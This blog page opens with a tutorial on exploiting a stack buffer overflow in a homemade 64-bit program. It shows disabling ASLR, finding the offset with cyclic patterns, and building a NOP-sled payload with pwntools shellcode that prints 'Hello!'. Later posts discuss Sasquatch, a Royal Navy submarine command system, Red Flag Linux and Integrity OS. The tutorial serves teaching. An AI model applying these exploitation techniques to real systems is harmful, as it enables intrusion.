Exploit Development with AFL, PEDA and PwnTools



In a previous post, we studied how to fuzz a simple homemade 64-bit program using AFL. We found that we could cause a segmentation fault in the target using some specific inputs. In this post (and in this video), we will cover the next step: confirming whether the crash can lead to an exploitable vulnerability. To do so, we’ll use GDB, the GNU debugger, and PEDA to analyze the execution of the target while it processes the inputs previously generated by AFL. By doing so, we will find a way to hijack the execution flow of the Vuln1 program in order to execute our own code.

Analyzing and Exploiting Vuln1

The hard part is now about to start, as we need to delve into the assembly code of the target, analyze the values of the registers and understand how they relate to the input. Fortunately, this step is greatly eased by tools such as PEDA and pwntools. Let’s install these right now. To install gdb-peda, simply run the shell script provided by the developers:
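If the script isn’t handy, PEDA can also be installed manually by cloning its repository and sourcing it from your ~/.gdbinit, as described in the PEDA README:

```shell
# Fetch PEDA and load it automatically whenever GDB starts
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
```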

Then install pwntools using pip with  sudo -H pip install pwntools . Once done, we are set to start analyzing the crash.

PEDA will automatically load whenever you start GDB. Before we start, it’s essential to understand some details about GDB, namely that it uses environment variables and hooks within the code of the debugged program. Why is this important? Exploits can heavily depend on knowing specific memory addresses within the program itself. These locations will vary depending on the defined environment variables and any additional instructions added by GDB. You must also be aware that most Linux distributions enable address space layout randomization (ASLR) by default. ASLR will defeat the exploit developed in this tutorial and must be disabled by editing the /proc/sys/kernel/randomize_va_space file. This file can contain one of the following values:

  • 0 – No randomization;
  • 1 – Conservative randomization. Shared libraries, stack, mmap() and VDSO addresses are randomized; and
  • 2 – Full randomization. In addition to the elements listed in the previous point, memory managed through brk() (the heap) is also randomized.

For the purposes of this exercise, set the value contained in this file to 0. You can see the impact disabling ASLR has on our experiment in the companion video of this post.
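On most distributions this can be done with a one-liner (root is required to write to the file):

```shell
# Disable ASLR system-wide until the next reboot
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```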

That being said, let’s start gdb with the vuln1 program by typing gdb ./vuln1  at the shell. Doing so will load the vuln1 program within the debugging process, but will not execute it until you execute the  run  command, or r  for short. Once you do so, you will see that you are prompted to enter the username and password just as when you are executing the program from the shell. If you type in regular strings, the program will execute as expected and terminate. Quite uneventful. Let’s try something more interesting: execute the program with the inputs generated by AFL. Assuming you have the inputs in a file called crash1.txt, type r < crash1.txt  to start the program using the AFL inputs. This time, you’ll notice that the execution ends with a Segmentation Fault (SIGSEGV) and quite a few things are displayed in your terminal.

Figure 1: Running the vuln1 program in GDB with the fuzzed input generated by AFL.

Let’s take a closer look at the information on the screen. When the fault was caught by the debugger, it stopped the execution of vuln1. At that point, PEDA captured the current state of the application, including the values of the registers, the program stack and the instruction which caused the fault. In this case, after reviewing the data, you should notice the value pointed to by the RSP register.

Figure 2: Value of the RSP register when vuln1 is run with AFL-generated inputs.

If we take a closer look at our input using the  hexdump -C crash1.txt  command, we’ll notice a familiar pattern:

Notice the various a7 61b4 6161 6161 a761 values. Well, it seems that these bytes somehow ended up being pointed to by the RSP register. There’s an easy way to confirm this with PEDA’s pattern generator, but first we need to know how long our input is:

The  wc command tells us that there are 114 bytes in the crash1.txt file, so let’s round this up to 120 bytes for simplicity. Going back to GDB, we will use PEDA to generate a cyclic pattern of 120 characters as input using the following command:
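At the PEDA prompt, the command looks like this (pat120 is an arbitrary file name):

```
gdb-peda$ pattern create 120 pat120
```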

This will create a file named pat120 with the generated cyclic pattern. If you take a quick look at it, you’ll have an idea of how it looks. For those who used Metasploit before, this functionality is similar to the pattern_create.rb script.

Now let’s run vuln1 using this newly generated input:
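Within the same GDB session, we feed the pattern file to the program’s stdin just as we did with the AFL input:

```
gdb-peda$ r < pat120
```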

Once again, a segmentation fault is thrown by vuln1 and caught by GDB; however, this time the values on the stack are different, as is the value pointed to by RSP. Looking back at our pattern, we clearly see that our input overwrites whatever value the RSP register points to.

The Cyclic Pattern is Pointed by RSP
Figure 3: The RSP register is pointing to the cyclic pattern generated at address 0x7fffffffdec8.

Why is this important? Because the value pointed to by this register will eventually be used as a return address once we hit the RET instruction at main+149. Therefore, if we control that value, we can redirect the execution flow to a location we control in memory and execute our own code. The first thing we need to figure out is: which bytes of our input end up pointed to by RSP? Again, PEDA provides an easy way to do so with the pattern_search  command. This function tells you where the pattern is detected in memory and in the registers:
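Right after the crash, still at the PEDA prompt:

```
gdb-peda$ pattern search
```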

In the output above, the value pointed to by RSP is overwritten after reading 40 bytes of the given input. This means that any 8-byte value (64 bits) located at offset 40 will end up pointed to by the RSP register and eventually loaded into RIP, to be used as the address of the next instruction to execute once we reach the RET instruction. Let’s test this by creating a really simple payload that will fill the value at RSP with “B”s. We do so by generating 40 “A”s, then 8 “B”s and 112 “C”s. We can use the printf command from the Bash shell, or you can do the same in Python or Perl. We will use Bash here:
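A minimal sketch using Bash’s printf (input2 is an arbitrary file name; brace expansion requires bash):

```shell
printf 'A%.0s' {1..40}  > input2   # 40-byte filler up to the saved return address
printf 'B%.0s' {1..8}  >> input2   # 8 bytes that land in the return-address slot
printf 'C%.0s' {1..112} >> input2  # trailing padding
```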

Restart vuln1 by providing input2 as input and take a look at the value of the RIP register:

Failed Hijack of the RSP register
Figure 4: The RIP register didn’t take the address stored in RSP.

Something didn’t go the way we expected. We should have seen RIP loaded with 0x4242424242424242 (‘BBBBBBBB’), but that’s not the case, and the reason is that we’re trying to fill RIP with an invalid 64-bit address, which itself causes a segmentation fault. Despite being able to address 64 bits, current processors actually only implement 48 bits of virtual address space, so the upper two bytes should always be null, i.e. 00 00. Knowing this, we’ll slightly modify our payload to include six “B”s rather than eight.

Note that we are on a little-endian architecture, and therefore we write the two null bytes AFTER the six “B”s. If we try again, we should be more successful:
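The adjusted payload can be generated the same way (input3 is again an arbitrary name); Bash’s printf emits literal null bytes for \x00:

```shell
printf 'A%.0s' {1..40}  > input3   # filler
printf 'B%.0s' {1..6}  >> input3   # low 6 bytes of the fake return address
printf '\x00\x00'      >> input3   # canonical addresses need null top bytes
printf 'C%.0s' {1..112} >> input3  # trailing padding
```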

We still get a segmentation fault, but this time it’s because we are trying to reach an invalid address. We have now proven that we can take control of the RIP register and redirect the execution flow. We also know that we can put our own code within the input given to the vuln1 application, and that it will be stored on the stack, which we made executable for the purpose of this exercise. The next step is to actually develop our exploit.

Crafting the Shellcode

Now that we have demonstrated the vulnerability, we need to decide what kind of payload we want. We’ll also determine where our shellcode is stored and then test our payload. This is the trickiest part of software exploitation, as many variables come into play. The addresses obtained in this post will differ from system to system, so yours will likely be different as well.

To generate our payload, we will use pwntools, a Python module extremely effective for prototyping working exploits. You will often find it used by CTF participants. First install the module using  pip install pwntools . Afterwards, open a Python interpreter such as ipython and import the module with from pwn import * .

We’ll use the shellcraft submodule, which offers a wide selection of payloads for multiple architectures. To output shellcode, simply select the appropriate function from the shellcraft module for the target architecture and operating system, i.e. ‘amd64’ and ‘linux’. You can obtain more information by using help(shellcraft) in a Python interpreter. You can also combine multiple payloads. Prior to using any shellcode, make sure to specify the architecture by setting the context object adequately:

For the purpose of this post, we’ll use a lame shellcode that will simply output “Hello!” and exit cleanly. In future posts, we’ll use more interesting payloads. We’ll structure our payload as follows:

Basic Exploit Structure for Vuln1
Figure 5: Basic payload structure for the Vuln1 exploit.

The first 40 bytes are simply used to fill the initial buffers and variables in order to reach the value pointed to by RSP. While we used ‘NOP‘ instructions, any value could be used. Bytes 40 to 48 will store the address of our shellcode, which follows immediately. Our shellcode will occupy the last 112 bytes, provided it fits that space:

Since our payload is 44 bytes – less than 112 bytes – it will easily fit in the space we have after the address, i.e. in the “C” segment of the payload. Had it been greater than 112 bytes, we would have had to split it. But let’s stick to the basics for now.

Jump Around

Next, we have to determine the address of our shellcode, i.e. where our shellcode is located on the stack. Looking back at figure 4, our placeholder for the address (i.e. “BBBBBB”) is at 0x7fffffffdec8. The address itself is 8 bytes long, and thus our shellcode will start at 0x7fffffffdec8+8:
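A quick sanity check of the arithmetic in a Python interpreter:

```python
# The saved-return-address slot, plus the 8-byte address itself
shellcode_addr = 0x7fffffffdec8 + 8
print(hex(shellcode_addr))  # 0x7fffffffded0
```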

Detailed structure of the Vuln1 payload.
Figure 6: Detailed structure of the Vuln1 payload.

Notice that we added a NOP sled after the address. Although not strictly needed, doing so gives us some leeway for error, especially when testing our payload outside GDB, as you will see later. Now let’s craft a quick Python function to create our payload and store it in a file. This will automate testing and make things much faster.

Let’s explain some of the code above:

    • start_addr  contains the address to jump to;
    • nop = asm('nop', arch="amd64") returns the opcode for the “NOP” instruction on the amd64 architecture;
    • nop1 = nop*40 creates the 40 NOP instructions at the beginning of our payload; and
    • struct.pack("<Q", addr)  stores the address of our shellcode in the payload in little-endian format. The Q tells the pack function that we are storing the address as an  unsigned long long . See the related Python docs for more information about using  struct

Start GDB again and make sure you have a breakpoint at the RET instruction, so we can follow the execution of our shellcode. If you look back at previous runs, you’ll notice that the RET instruction is located at main+149. To put a breakpoint at this address, simply type b *main+149  in GDB. This will cause the execution to pause at this address. Once paused, type  nexti and you’ll notice that we jump into our short NOP sled.

If you’d like to see the assembly translation of the opcodes at a specific address, use the pdisass command. For example, run  pdisass 0x7fffffffded0 and you should see the instructions listed below.

You can move through the instructions faster by using  nexti <count>, or just type continue (or c for short) to resume execution. If everything goes well, the program will output “Hello!” and exit without any error:

Working Exploit in Vuln1 (GDB)
Figure 7: Our exploit correctly prints “Hello!” and exits without error.

We now have a working exploit in GDB…admittedly not a terribly useful one. However if you try to launch this shellcode directly from the command-line, you’ll notice that you will get a Segmentation Fault warning:

As mentioned at the beginning, this is due to GDB adding environment variables on the stack when loading the Vuln1 program. You can compare the environment variables between your shell and GDB by typing  env at the shell and  show env at the GDB prompt. You’ll notice that GDB adds the “LINES” and “COLUMNS” variables. Also note that different systems will have different variables defined, adding to the instability of our exploit. To prevent environment variables from interfering with our exploit, we will unset all of them in GDB using the unset env command. When running our target from the shell, we will prefix it with  env - to clear all variables in the shell. For example:
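For instance, assuming the payload file from earlier is named input4 (the name is arbitrary):

```shell
# Run the target with an empty environment
env - ./vuln1 < input4
```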

To make our exploit work in the shell, we will need to adjust our jumping address. If we rerun our target with a new cyclic pattern without the environment variables, we obtain a different address:

In our first attempt, with the environment variables present, RSP contained the address 0x7fffffffdec8; this time RSP holds 0x7fffffffed18. Adjust this value in the script provided above and try again.

Despite our best efforts, we still can’t exploit from the shell, but we are getting closer. At this point there is no trick to getting it right, only trial and error. GDB may be adding extra instructions to the code for debugging purposes, still making our jump invalid. There are two variables you can adjust to try to fix the issue:

  1. Gradually increase the jump address; and
  2. Increase the size of the NOP sled preceding the shellcode.

In my case, the exploit finally worked after increasing the jump address by 140 bytes and growing the NOP sled to 80 bytes. Below is the updated Python script. Note that these values will differ on your system:
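A standalone sketch of the adjusted script, stdlib only (the offsets and output file name are from my system, and the actual “Hello!” shellcode bytes are elided):

```python
import struct

# Address observed without environment variables, nudged forward by trial and error
start_addr = 0x7fffffffed18 + 8 + 140

nop1 = b'\x90' * 40                    # filler up to the saved return address
addr = struct.pack('<Q', start_addr)   # little-endian jump target
sled = b'\x90' * 80                    # enlarged NOP sled for extra slack
shellcode = b''                        # same "Hello!" shellcode as before goes here

with open('input5', 'wb') as f:
    f.write(nop1 + addr + sled + shellcode)
```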


Crafting exploits is a mixture of technology and art. While there is a process and a methodology to go about it, there’s always something different that will require additional research, experimentation and tweaking. Even then, your exploit is never 100% guaranteed, given the many variables that can affect offsets or memory locations. Practice and experience will hone these skills. This post is a very timid first step and has many failings: we removed common memory protections, we included a rather useless payload, and we need to remove environment variables for it to work outside of GDB. We’ll gradually improve the realism of this exercise. Still, we now better understand the overall exploit development process, along with the various difficulties involved.

YouTube Video


Zalewski, M. American Fuzzy Lop. Retrieved June 24, 2017, from http://lcamtuf.coredump.cx/afl/

Salzman, P. (n.d.). Using GNU’s GDB Debugger. Retrieved June 24, 2017, from http://www.dirac.org/linux/gdb/

PEDA – Python Exploit Development Assistance for GDB. Retrieved June 24, 2017, from https://github.com/longld/peda


64-bit Linux stack smashing tutorial: Part 1. Retrieved June 24, 2017, from https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/

Mr.Un1k0d3r. 64 Bits Linux Stack Based Buffer Overflow. Retrieved June 24, 2017, from https://www.exploit-db.com/docs/33698.pdf

Bravon, A. “How Effective is ASLR on Linux Systems?” Security et alii. February 03, 2013. Accessed July 12, 2017. https://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/.

Vanhoef, M. Common Pitfalls When Writing Exploits. Retrieved June 24, 2017, from http://www.mathyvanhoef.com/2012/11/common-pitfalls-when-writing-exploits.html

Additional Reading

Klein, Tobias. A bug hunter’s diary: a guided tour through the wilds of software security. No Starch Press, 2011. http://amzn.to/2h7imkp

Koziol, Jack, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel Mehta, and Riley Hassell. “The Shellcoder’s Handbook.” Edycja polska. Helion, Gliwice (2004). http://amzn.to/2h7iArF

Dowd, Mark, John McDonald, and Justin Schuh. The art of software security assessment: Identifying and preventing software vulnerabilities. Pearson Education, 2006. http://amzn.to/2vNZBG2

Sasquatch for Ubuntu


I am an avid user of binwalk, since it automates the initial reverse engineering work. It identifies the compression scheme, if any, and the file format of a given firmware fairly easily once you weed out the false positives.

Last week I built a virtual machine (VM) using a minimal install of Xubuntu Linux. My last Debian-based VM had become bloated and slow, so it was time to clean up. Surprisingly, I couldn’t get Sasquatch to compile on Ubuntu. Sasquatch is a helper tool for non-standard SquashFS file systems, which are rampant in the Internet-of-Things (IoT) realm. It seems the patches made for squashfs 4.3 just won’t compile under Ubuntu Linux, likely due to the liblzma library shipped with the operating system.

Trying to fix the patches soon led to an endless sequence of additional compile errors, so I took the easy way out: I compiled Sasquatch on Debian and just used the binary in my Xubuntu VM. It worked!

Anyone in the same situation can download the pre-compiled Sasquatch binary here. Happy reverse engineering!

Submarine Command System


A press release from BAE Systems announced the installation of the Submarine Command System Next Generation (SMCS NG) on twelve nuclear submarines of the Royal Navy, effectively completing the conversion of the seven Trafalgar-class submarines, four Vanguard-class submarines and one Swiftsure-class submarine[1].

The new command system is based on COTS hardware and software products. It uses mainstream PCs and Windows as supporting components. All computers are connected on a LAN over fiber-optic Ethernet. According to The Register, the system will mostly be based on Windows XP[2], although it was initially decided it would be based on Windows 2000.

The role of this system is to store and compile data from various sensors in order to present tactical information to the command team. It also controls the weaponry:

SMCS NG is designed to handle the growing volume of information available in modern nuclear submarines and to control the sophisticated underwater weapons carried now and in the future. Its core capability is the assimilation of sensor data and the compilation and display of a real time tactical picture to the Submarine Command Team[3].

The SMCS NG system is the descendant of the previous SMCS system, proposed back in 1983 when the U.K. decided to build a new command system for the then-new Trident boats. Before that, all electronics were custom-built by Ferranti. SMCS would use COTS components to minimize costs and become less dependent on a single company. The architecture of the command system was modular and written in Ada 83. The core of the system contains an input/output computer node, which processes data from the sensors and weapons systems. There is also the central node, used for processing all the data. Each central node is duplicated for fault tolerance, with each being dual modular redundant, meaning hardware components work in parallel in case one becomes defective. The dual central nodes are connected to each other as well as to the Multi Function Consoles, a Main Tactical Display and two Remote Terminals, which provide the human-computer interface. The first phase of the project was to install SMCS on the Vanguard-class submarines.

In 1990, it was decided to extend SMCS to other submarine classes and that the new command system would use UNIX as its base operating system. Because of the Ada architecture, problems arose when technicians tried to map SMCS onto UNIX run-time processes. Solaris on SPARC machines was finally selected for the Multi Function Consoles. The central nodes kept their original architecture in Ada.

SMCS Multi Function Monitor in a Vanguard Class Submarine
SMCS Multi Function Monitor in a Vanguard Class Submarine

In 2000, the project became fully owned by BAE Systems, and the move from SPARC computers to PCs began. The switch of operating system was more contentious: management preferred Windows, while the engineers promoted variants of UNIX such as BSD, Linux or Solaris. The engineers’ main argument was that with UNIX it would be possible to remove all the extra code unneeded for submarine operations, thus making the system more secure. However, the management’s point of view prevailed, and thus was born the “Windows for Warships” label.

Windows was chosen even after the USS Yorktown incident of 1997 in the US, in which the ship was crippled after a sysadmin entered invalid data into the database through the Remote Database Manager.[4]

Insert any jokes about Windows controlling nuclear subs into the comments. Thank you.

Clippy Launch Warning Blue Screen of Death

See also:

SMCS“, AllExperts, http://en.allexperts.com/e/s/sm/smcs.htm (accessed on December 17, 2008)

Submarine Command System (SMCS)“, Ultra Electronics, http://www.ultra-ccs.com/systems/smcs/ (accessed on December 17, 2008)

Operating Systems Contracts, Trusted Software?“, Richard Smedly, Linux Format, March 2005, http://www.linuxformat.co.uk/pdfs/LXF64.pro_war.pdf (accessed on December 17, 2008)

Development Drivers in Modern Multi-function Consoles and Cabinets“, Armed Forces International, http://www.armedforces-int.com/categories/military-consoles-and-cabinets/development-drivers-in-modern-multifunction-consoles-and-cabinets.asp (accessed on December 17, 2008)

[1] “Royal Navy’s Submarine Command System Installation Programme Completes Ahead of Time”, BAE Systems, December 15, 2008, http://www.baesystems.com/Newsroom/NewsReleases/autoGen_108111514515.html (accessed on December 17, 2008)

[2] “Royal Navy completes Windows for SubmarinesTM rollout”, Lewis Page, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/ (accessed on December 17, 2008)

[3] Ibid.

[4] “Operating Systems Contracts, Trusted Software? “, Richard Smedly, Linux Format, March 2005, p.72

China’s Red Flag Linux


Red Flag Linux Logo
Red Flag Linux Logo

Two days ago, the Inquirer posted an article on a new law passed in the Chinese city of Nanchang, in the Jiangxi province, requiring Internet cafes to replace pirated copies of Windows with legitimate software[1]. The alternative proposed to the cafes is the Red Flag Linux distribution, which prompted fears of snooping reported by the U.S.-based Radio Free Asia. The radio quoted the director of the China Internet Project, Xiao Qiang, as saying that “cafes were being required to install Red Flag Linux even if they were using authorised copies of Windows[2]“. According to an official of the Nanchang Cultural Discipline Team, the transition from Windows to Red Flag has already started in the city’s 600 Internet cafes[3], and not across all of China as many headlines claim.

Short History of Red Flag Linux

Red Flag Linux was created by the Software Research Institute of the Chinese Academy of Sciences in 1999 and was financed by a government firm, NewMargin Venture Capital. The distro is now distributed to government offices and businesses by Red Flag Software Co[4]. The goal of the Chinese government was to reduce Microsoft’s dominance over the operating system market. It therefore invested in Red Flag Software through CCIDNET Investment, a venture capital firm owned by the Ministry of Information Industry[5].

At first, the OS was exclusively in Chinese and restricted to the Chinese market. In 2003, the company developed an English version for international markets. This effort received further help after Hewlett-Packard concluded a plan to assist Red Flag in various fields to market its operating system around the world[6]. As many companies took interest in the Chinese economic boom, Red Flag signed partnerships with various western companies such as IBM, Intel, HP and Oracle[7], which wanted to open up the Chinese market. RealNetworks, among others, distributed its media software with Red Flag[8].

According to IDC, a market-research company, the revenue of Red Flag Software Co. totalled US$8.1 million in 2003, with 24,000 server operating system shipments accounting for $5.9 million of that revenue[9]. In 2006, Red Flag Software was the top Linux distributor in China, with over 80% of the Linux desktop market[10]. Later, versions of Red Flag were made for mobile devices[11] and embedded devices[12]. It can also be found on various servers sold across China by Dell.

It therefore seems that Red Flag Linux, after a slow period during the dot-com crash, is alive and well in China. The operating system has changed quite a bit since its beginnings in 1999, and we can expect its use to grow in the coming years, as prices for proprietary OSes such as Windows can be quite prohibitive for most of the Chinese population. The Red Flag Linux distro can be downloaded for free from Red Flag Software Co. (see the end of this article for the links), while Vista Home Basic sold for the equivalent of US$65.80 in 2007[13].

Technical Aspects

According to an early reviewer who tested the OS back in 2002[14], the first Red Flag 2.4 Linux OS was based on the Red Hat distro. It came with basically the same options, such as X11 with KDE as the default interface, and used the ReiserFS file system. Interestingly, no root password was needed, and root seemed to be the default account. It came with the standard user applications such as XMMS.

Since then, Red Flag Linux has switched from Red Hat to Asianux 2.0 as its base distribution[15]. A root password must now be specified at installation, and the OS is available as a Live CD. Also, don’t expect a completely English system: while the most important parts should be in English, some may still be in Mandarin. XMMS has long been replaced with KDE’s multimedia tools such as KsCD, JuK, Dragon Player and KMix. Other software you can find on the “Olympic” beta version of the distribution, released last September[16]:

  • KAddressBook
  • Kopete
  • Kontact
  • Krfb
  • KOrganizer
  • KNode
  • Firefox
  • Akregator
  • KMail
  • Akonadi

According to the reviewer, and by looking at the English website, it does look like the English version is not maintained as actively as the Chinese version. I therefore believe the Chinese version may contain more features and fewer bugs. It might even contain office software such as RedOffice.

This operating system is certainly one to watch, not really for its technical merits or usefulness, but mainly because it may spread across China as businesses and governmental agencies adopt Red Flag Linux. If an attack were mounted against Chinese communication infrastructure, this distribution would certainly be one of the targets to analyze in order to find holes and exploits. Unfortunately, finding information about this Linux is tricky, mainly due to the language barrier; machine translation is amusing but useless. It is hard to determine whether the OS contains any modification for spying or snooping, as one would need to go through the source of a large part of the OS (I wish I had time to do that). Even then, it’s easier than examining closed-source software. Snooping can come from anywhere, after all; they might be better off with Red Flag Linux than with Sony software[17].

If anyone has information, please share it, as information should always be shared. In the meantime, a desktop version of Red Flag Linux is available here. And if you can understand Mandarin, maybe you could visit this page.

Enrich your Mandarin Vocabulary: 红旗 = Red Flag

See also:

Red Flag Software Co., http://www.redflag-linux.com/ (Mandarin language)

Red Flag Software Co., http://www.redflag-linux.com/eindex.html (English language)

Red Flag Linux may be next on IBM’s agenda“, James Niccolai, Network World, September 22, 2006, http://www.networkworld.com/news/2006/092206-red-flag-linux-may-be.html (accessed on December 4, 2008)

Dell flies Red Flag Linux in China“, Michael Kanellos, ZDNet, December 3, 2004, http://news.zdnet.com/2100-3513_22-133162.html (accessed on December 4, 2008)

With HP’s help, China’s Red Flag Linux to step onto global stage“, Sumner Lemon, ComputerWorld, September 2, 2003, http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,84602,00.html (accessed on December 5, 2008)


[1] “Chinese ordered to stop using pirate software”, Emma Hughes, The Inquirer, December 3, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/12/03/chinese-ordered-away-pirate (accessed on December 4, 2008)

[2] “New fears over cyber-snooping in China”, Associated Press, The Guardian, December 4, 2008, http://www.guardian.co.uk/world/2008/dec/04/china-privacy-cyber-snooping (accessed on December 4, 2008)

[3] “Chinese Authorities Enforce Switch from Microsoft”, Ding Xiao, translated by Chen Ping, Radio Free Asia Mandarin Service, December 2, 2008, http://www.rfa.org/english/news/china/microsoft%20to%20linux-12022008144416.html (accessed on December 4, 2008)

[4] Ibid.

[5] “Raising the Red Flag”, Doc Searls, Linux Journal, January 30, 2002, http://www.linuxjournal.com/article/5784 (accessed on December 4, 2008)

[6] “English version of China’s Red Flag Linux due soon”, Sumner Lemon, InfoWorld, September 8, 2003, http://www.infoworld.com/article/03/09/08/HNenglishredflag_1.html (accessed on December 4, 2008)

[7] “Red Flag Linux”, Operating System Documentation Project, January 13, 2008, http://www.operating-system.org/betriebssystem/_english/bs-redflag.htm (accessed on December 4, 2008)

[8] “RealNetworks signs up Red Flag Linux”, Stephen Shankland, CNet News, October 6, 2004, http://news.cnet.com/RealNetworks-signs-up-Red-Flag-Linux/2110-7344_3-5399530.html (accessed on December 4, 2008)

[9] “China’s Red Flag Linux to focus on enterprise”, Amy Bennett, IT World, August 16, 2004, http://www.itworld.com/040816chinaredflag (accessed on December 4, 2008)

[10] “Red Flag Linux 7.0 Preview (Olympic Edition)”, Begin Linux Blog, August 15, 2008, http://beginlinux.wordpress.com/2008/08/15/red-flag-linux-70-preview/ (accessed on December 4, 2008)

[11] “Introduction to MIDINUX”, Red Flag Software, June 2007, http://www.redflag-linux.com/chanpin/midinux/midinux_intro.pdf (accessed on December 4, 2008)

[12] “Car computer runs Red Flag Linux”, LinuxDevices, November 13, 2007, http://www.linuxdevices.com/news/NS4055537183.html (accessed on December 4, 2008)

[13] “Update: Microsoft cuts Windows Vista price in China”, Sumner Lemon, InfoWorld, August 3, 2007, http://www.infoworld.com/article/07/08/03/Microsoft-cuts-Vista-price-in-China_1.html (accessed on December 5, 2008)

[14] “Red Flag, China’s home-grown Linux distribution, is a good start”, Matt Michie, Linux.com, February 22, 2002, http://www.linux.com/articles/21365 (accessed on December 4, 2008)

[15] “Red Flag Linux Desktop”, http://www.iterating.com/products/Red-Flag-Linux-Desktop/review/Janos/2007-07-01 (accessed on December 5, 2008)

[16] “Red Flag Linux Olympic Edition fails to medal”, Preston St. Pierre, Linux.com, September 11, 2008, http://www.linux.com/feature/146867 (accessed on December 5, 2008)

[17] “Real Story of the Rogue Rootkit”, Bruce Schneier, Wired, November 17, 2005, http://www.wired.com/politics/security/commentary/securitymatters/2005/11/69601 (accessed on December 5, 2008)

Integrity OS to be Released Commercially


The Integrity operating system, an OS with the highest security rating from the National Security Agency (NSA) and used by the military, will now be sold to the private sector by Integrity Global Security, a subsidiary of Green Hills Software. The commercial operating system will be based on the Integrity-178B OS, first used in the B-1B bomber in 1997 and afterwards in F-16, F-22 and F-35 military jets. It is also used in the Airbus A380 and Boeing 787 airliners[1].

The Integrity-178B OS has been certified EAL 6+ (Evaluation Assurance Level 6, augmented) by the NSA and is, for now, the only OS to have achieved this level of security. Most commercial operating systems, such as Windows and Linux distributions, hold an EAL 4+ certification. The EAL indicates the degree of assurance of an evaluated system: at level 1, the application has merely been tested, and a security breach would not incur serious consequences; at level 7, the highest level, the application is strong enough to resist high-risk threats and withstand sophisticated attacks. Only one application holds a level 7 certification: the Tenix Data Diode by Tenix America[2].

The Integrity OS can run by itself or host other operating systems on top of it, such as Windows, Linux, Mac OS, Solaris, VxWorks, Palm OS and even Symbian OS. Each guest OS runs in its own partition, confining eventual failures and security vulnerabilities to that OS alone.



Product                          Protection Profile   Security Level
Integrity-178B                   SKPP                 EAL 6+
PR/SM LPAR Hypervisor            —                    —
Solaris (and Trusted Solaris)    —                    EAL 4+
Windows Vista                    Not evaluated        EAL 4+
Windows XP                       —                    EAL 4+

Main Operating Systems with the type of protection profile used and the assigned EAL[3]

The main feature of the Integrity OS is its use of the Separation Kernel Protection Profile (SKPP). A protection profile (PP) is a document, used during the certification process, that describes the security requirements for a particular problem. The SKPP is a standard developed by the NSA that defines the requirements for a high-robustness operating system; it is based on John Rushby‘s concept of the separation kernel, which can be summarized as:

… a single-processor model of a distributed system in which all user processes are separated in time and space from each other. In a distributed system, the execution of each process takes place in a manner independent of any other[4]

Basically, the concept is that of a computer simulating a distributed environment: each process is kept independent from the others, preventing a corrupted or breached application from inadvertently gaining access to restricted resources, as often happens through privilege escalation on other commercial OSes.
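The idea can be sketched as a toy model. The class and method names below are hypothetical and purely illustrative; a real separation kernel such as Integrity-178B enforces this in hardware-backed kernel code, not application-level Python. The sketch shows the two guarantees: private memory per partition (space separation) and a fixed schedule of who may run (time separation), with every access mediated by the kernel.

```python
# Toy model of Rushby's separation-kernel concept (illustration only).
# Each partition owns private memory (space separation), and a fixed
# round-robin schedule decides who may run in each slot (time separation).

class Partition:
    def __init__(self, name):
        self.name = name
        self._memory = {}  # private store: no other partition can reach it

class SeparationKernel:
    def __init__(self, names):
        self._partitions = {n: Partition(n) for n in names}
        self._schedule = list(names)  # fixed, precomputed schedule

    def _check(self, slot, caller):
        # The kernel mediates every access: a caller may only run in its
        # own slot, and only against its own memory.
        scheduled = self._schedule[slot % len(self._schedule)]
        if caller != scheduled:
            raise PermissionError(f"{caller} is not scheduled in slot {slot}")
        return self._partitions[caller]

    def write(self, slot, caller, key, value):
        self._check(slot, caller)._memory[key] = value

    def read(self, slot, caller, key):
        return self._check(slot, caller)._memory[key]

kernel = SeparationKernel(["guest_a", "guest_b"])
kernel.write(0, "guest_a", "secret", 42)    # guest_a runs in slot 0
print(kernel.read(2, "guest_a", "secret"))  # slot 2 is guest_a's again -> 42
try:
    kernel.read(0, "guest_b", "secret")     # wrong slot, wrong memory
except PermissionError as exc:
    print("blocked:", exc)
```

Even if `guest_b` is fully compromised, the only interface it has is the kernel's mediated calls, so the breach stays confined to its own partition.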

Schema of the Integrity 178B Operating System

What makes the SKPP standard so secure is that it requires formal methods of verification during development. Furthermore, the source code is examined by a third party, in this case the NSA.

SKPP separation mechanisms, when integrated within a high assurance security architecture, are appropriate to support critical security policies for the Department of Defense (DoD), Intelligence Community, the Department of Homeland Security, Federal Aviation Administration, and industrial sectors such as finance and manufacturing.[5]

Of course, the OS might be conceived for security and toughness, but in the end it all depends on how it is used and configured. That is going to be the real test. Much as I believe the people who verified the OS are competent, and the expensive tests the company paid for are rigorous, the real exam will be releasing it into the wild so that hackers from all around the world can have a try at it. Hopefully, we will be able to play with this OS someday…

See also:

“U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007

“Formal Refinement for Operating System Kernels”, Chapter 4, pp. 203-209, Iain D. Craig, Springer London, SpringerLink, July 2007

“Separation kernel for a secure real-time operating system”, Rance J. DeLong, Safety Critical Embedded Systems, February 2008, p. 22

“Controlled Access Protection Profile”, Information Systems Security Organization, National Security Agency, October 8, 1999

[1] “Secure OS Gets Highest NSA Rating, Goes Commercial”, Kelly Jackson Higgins, DarkReading, November 18, 2008, http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=212100421 (accessed on November 19, 2008)

[2] “TENIX Interactive Link solutions”, TENIX America, http://www.tenixamerica.com/images/white_papers/datasheet_summary.pdf (accessed on November 19, 2008)

[3] “The Gold Standard for Operating System Security: SKPP”, David Kleidermacher, Integrity Global Security, 2008, http://www.integrityglobalsecurity.com/downloads/SKPPGoldenStandardWhitePaper.pdf (accessed on November 19, 2008)

[4] “Formal Refinement for Operating System Kernels”, Iain D. Craig, Springer London, Springer Link, July 2007, p. 203

[5] “U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, Information Assurance Directorate, June 29, 2007, p.10